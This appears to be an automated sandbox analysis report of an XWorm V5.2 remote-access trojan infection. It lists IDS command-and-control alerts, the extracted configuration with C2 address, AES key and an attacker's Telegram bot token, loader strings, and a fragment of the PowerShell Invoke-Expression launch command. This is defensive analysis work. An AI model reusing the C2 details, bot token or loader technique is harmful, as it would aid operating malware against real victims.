$_4;Remove-Item -Path $path -Force;$_4 | Invoke-Expression", ProcessId: 332, ProcessName: powershell.exe
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T17:18:41.790973+010028536851A Network Trojan was detected192.168.2.649687149.154.167.220443TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T17:18:59.552890+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:19:10.004452+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:19:12.206804+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:19:24.877789+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:19:37.574662+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:19:40.004656+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:19:49.520379+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:19:54.690029+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:19:54.781647+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:19:55.068365+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:19:56.261572+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649692TCP
                2025-03-07T17:20:04.911144+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:20:05.011901+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:20:05.322067+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:20:06.565378+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:20:06.664036+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:20:10.003568+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:20:19.319436+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:20:31.974613+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:20:40.022332+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:20:44.648533+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:20:57.317521+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:10.035914+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:10.332799+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:10.482556+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:10.930517+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:11.826591+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:13.614468+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:17.331382+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:24.498739+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:38.834655+010028528701Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T17:18:59.595407+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:19:12.208830+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:19:24.880831+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:19:37.576642+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:19:48.957561+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:49.098497+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:49.241743+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:49.382974+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:49.520113+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:49.558520+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:19:49.662414+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:49.801744+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:49.942178+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:50.082810+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:50.238965+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:50.363797+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:50.489252+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:50.629611+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:50.754516+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:50.879825+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:51.020113+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:51.145327+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:51.270134+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:51.397309+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:51.521849+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:51.645150+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:51.770950+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:51.895488+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:52.035780+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:52.196525+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:52.332633+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:52.488879+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:52.613967+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:52.770143+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:52.908138+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:53.035749+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:53.180330+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:53.317079+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:53.474802+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:53.599653+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:53.755882+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:53.890904+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:54.020085+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:54.177107+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:54.317369+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:54.473259+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:54.625536+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:54.691690+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:19:54.770179+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:54.825743+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:19:54.926407+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:55.051455+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:55.091019+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:19:55.191993+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:55.362996+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:55.491023+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:55.631065+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:55.789012+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:55.926516+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:56.067198+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:56.207835+010028529231Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:20:04.914952+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:20:05.013440+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:20:05.120026+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:20:05.132978+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:20:05.225043+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:20:05.327150+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:20:05.429315+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:20:05.437052+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:20:06.566482+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:20:06.664693+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:20:19.321088+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:20:31.977112+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:20:44.654213+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                2025-03-07T17:20:57.327945+010028529231Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T17:19:10.004452+010028528741Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:19:40.004656+010028528741Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:20:10.003568+010028528741Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:20:40.022332+010028528741Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:10.035914+010028528741Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:10.332799+010028528741Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:10.482556+010028528741Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:10.930517+010028528741Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:11.826591+010028528741Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:13.614468+010028528741Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:17.331382+010028528741Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:24.498739+010028528741Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                2025-03-07T17:21:38.834655+010028528741Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T17:19:48.957561+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:49.098497+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:49.241743+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:49.382974+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:49.520113+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:49.662414+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:49.801744+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:49.942178+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:50.082810+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:50.238965+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:50.363797+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:50.489252+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:50.629611+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:50.754516+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:50.879825+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:51.020113+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:51.145327+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:51.270134+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:51.397309+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:51.521849+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:51.645150+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:51.770950+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:51.895488+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:52.035780+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:52.196525+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:52.332633+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:52.488879+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:52.613967+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:52.770143+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:52.908138+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:53.035749+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:53.180330+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:53.317079+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:53.474802+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:53.599653+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:53.755882+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:53.890904+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:54.020085+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:54.177107+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:54.317369+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:54.473259+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:54.625536+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:54.770179+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:54.926407+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:55.051455+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:55.191993+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:55.362996+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:55.491023+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:55.631065+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:55.789012+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:55.926516+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:56.067198+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                2025-03-07T17:19:56.207835+010028528731Malware Command and Control Activity Detected192.168.2.649692193.32.177.636000TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T17:18:58.941340+010028559241Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T17:19:42.325347+010028531911Malware Command and Control Activity Detected193.32.177.636000192.168.2.649688TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T17:19:41.690209+010028531921Malware Command and Control Activity Detected192.168.2.649688193.32.177.636000TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-03-07T17:18:41.790973+010018100071Potentially Bad Traffic192.168.2.649687149.154.167.220443TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["193.32.177.63"], "Port": 6000, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Telegram Token": "7238632531:AAGCQZAh03hAwOcuP9HUeoAP5AQV0o0tp24", "Telegram Chatid": "8080837794", "Version": "XWorm V5.2"}
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 93.9% probability
                Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmpString decryptor: 193.32.177.63
                Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmpString decryptor: 6000
                Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmpString decryptor: <123456789>
                Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmpString decryptor: <Xwormmm>
                Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmpString decryptor: XWorm V5.2
                Source: 0000000B.00000002.1553871152.0000022819B39000.00000004.00000800.00020000.00000000.sdmpString decryptor: USB.exe
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49687 version: TLS 1.2
                Source: Binary string: <>c__DisplayClass6_0<>9__0<Main>b__0IEnumerable`1List`1ReadInt32Dictionary`2ReadInt16get_UTF8<Module>CreateFileAGetUACPAGE_EXECUTE_READWRITEQxwgIQJtuynihFkPbNFN<>OMODULEINFOSystem.IOAESbavkmsLBGTsuCIUPxeNajklsXCgRhERjiyTqCLuQEHmaFtfZkUJmjvFFFlvXCosturacostura.metadatamscorlibSystem.Collections.GenericsrcReadThreadLoadGetPayloadAddAesManagedisAttachedInterlockedcostura.costura.pdb.compressedcostura.costura.dll.compressedcostura.microsoft.win32.taskscheduler.dll.compressedcostura.ja.microsoft.win32.taskscheduler.resources.dll.compressedcostura.de.microsoft.win32.taskscheduler.resources.dll.compressedcostura.pl.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-cn.microsoft.win32.taskscheduler.resources.dll.compressedcostura.fr.microsoft.win32.taskscheduler.resources.dll.compressedcostura.tr.microsoft.win32.taskscheduler.resources.dll.compressedcostura.es.microsoft.win32.taskscheduler.resources.dll.compressedcostura.it.microsoft.win32.taskscheduler.resources.dll.compressedcostura.zh-hant.microsoft.win32.taskscheduler.resources.dll.compressedcostura.ru.microsoft.win32.taskscheduler.resources.dll.compressedcostura.sv.microsoft.win32.taskscheduler.resources.dll.compressedisElevatedEncodeCommandGetMethodsubscribeReplaceTaskServiceGetResourceset_ModeshareModePaddingModeCompressionModeCipherModeget_UnicodeSizeOfImageget_MessageExchangenullCacheInvokeEnumerableIDisposableGetModuleHandleCloseHandlehandletemplateFileMapViewOfFilefileIsInRoleWindowsBuiltInRoleConsolehModulemoduleget_NameprocNameGetAssemblyResourceNamelpFileNamefileNamemoduleNameget_FullNamefullNameGetNamerequestedAssemblyNamenameReadLineWriteLineValueTypeGetTypeSystem.CorecultureMethodBaseDisposeElevateWriteCompilerGeneratedAttributeGuidAttributeUnverifiableCodeAttributeDebuggableAttributeComVisibleAttributeAssemblyTitleAttributeAssemblyTrademarkAttributeTargetFrameworkAttributeAssemblyFileVersionAttributeAssemblyConfigurationAttributeAssemblyDescriptionAttributeCompilationRelaxationsAttributeAssemblyProductAttributeAssemblyCopyrightAttributeAssemblyCompanyAttributeRuntimeCompatibilityAttributeReadByte_GetConfigValueTryGetValueadd_AssemblyResolveget_SizedwSizesizePyramid.Phantom.Stager.ConfigconfigSystem.Threadingset_PaddingEncodingSystem.Runtime.VersioningCreateFileMappingFromBase64StringToBase64StringCultureToStringGetStringAttachmaximumSizeHighfileOffsetHighget_LengthEndsWithnullCacheLockTransformFinalBlockUnhookNewTaskFiTaMpiODlMarshalSystem.Security.Principalget_PrincipalTaskPrincipalWindowsPrincipalset_RunLevelTaskRunLevelBaseOfDllUnhookDllkernel32.dllpsapi.dllmsvcrt.dllReadStreamLoadStreamGetManifestResourceStreamDeflateStreamMemoryStreamstreamProgramset_ItemOperatingSystemSymmetricAlgorithmICryptoTransformset_HiddenMainAppDomainget_CurrentDomainget_OSVersionget_VersionFodyVersionSystem.IO.CompressionGetModuleInformationdestinationSystem.GlobalizationExecActionSystem.ReflectionActionCollectionTriggerCollectionRegisterTaskDefinitionset_PositioncreationDispositionExceptionS
                Source: Binary string: C:\Users\dahal\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdbSHA256 source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: costura.costura.pdb.compressed source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2718136098.0000024310CFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.000002281B5C4000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: costura.costura.pdb.compressed8 source: powershell.exe, 00000003.00000002.2338047448.00000243022CB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: costura.costura.pdb.compressed|||Costura.pdb|806F4C19B2D7FD9E3B836269EC07647019A29E95|7960 source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2718136098.0000024310CFB000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: C:\Users\dahal\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net45\Microsoft.Win32.TaskScheduler.pdb source: powershell.exe, 00000003.00000002.2718136098.0000024311715000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1553871152.0000022819A6F000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2852873 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M2 : 192.168.2.6:49692 -> 193.32.177.63:6000
                Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49692 -> 193.32.177.63:6000
                Source: Network trafficSuricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.6:49688 -> 193.32.177.63:6000
                Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 193.32.177.63:6000 -> 192.168.2.6:49688
                Source: Network trafficSuricata IDS: 2852923 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) : 192.168.2.6:49688 -> 193.32.177.63:6000
                Source: Network trafficSuricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 193.32.177.63:6000 -> 192.168.2.6:49688
                Source: Network trafficSuricata IDS: 2853192 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - sendPlugin Outbound : 192.168.2.6:49688 -> 193.32.177.63:6000
                Source: Network trafficSuricata IDS: 2853191 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - savePlugin Inbound : 193.32.177.63:6000 -> 192.168.2.6:49688
                Source: Network trafficSuricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 193.32.177.63:6000 -> 192.168.2.6:49692
                Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49687 -> 149.154.167.220:443
                Source: Network trafficSuricata IDS: 2853685 - Severity 1 - ETPRO MALWARE Win32/XWorm Checkin via Telegram : 192.168.2.6:49687 -> 149.154.167.220:443
                Source: Malware configuration extractorURLs: 193.32.177.63
                Source: unknownDNS query: name: api.telegram.org
                Source: global trafficTCP traffic: 192.168.2.6:49688 -> 193.32.177.63:6000
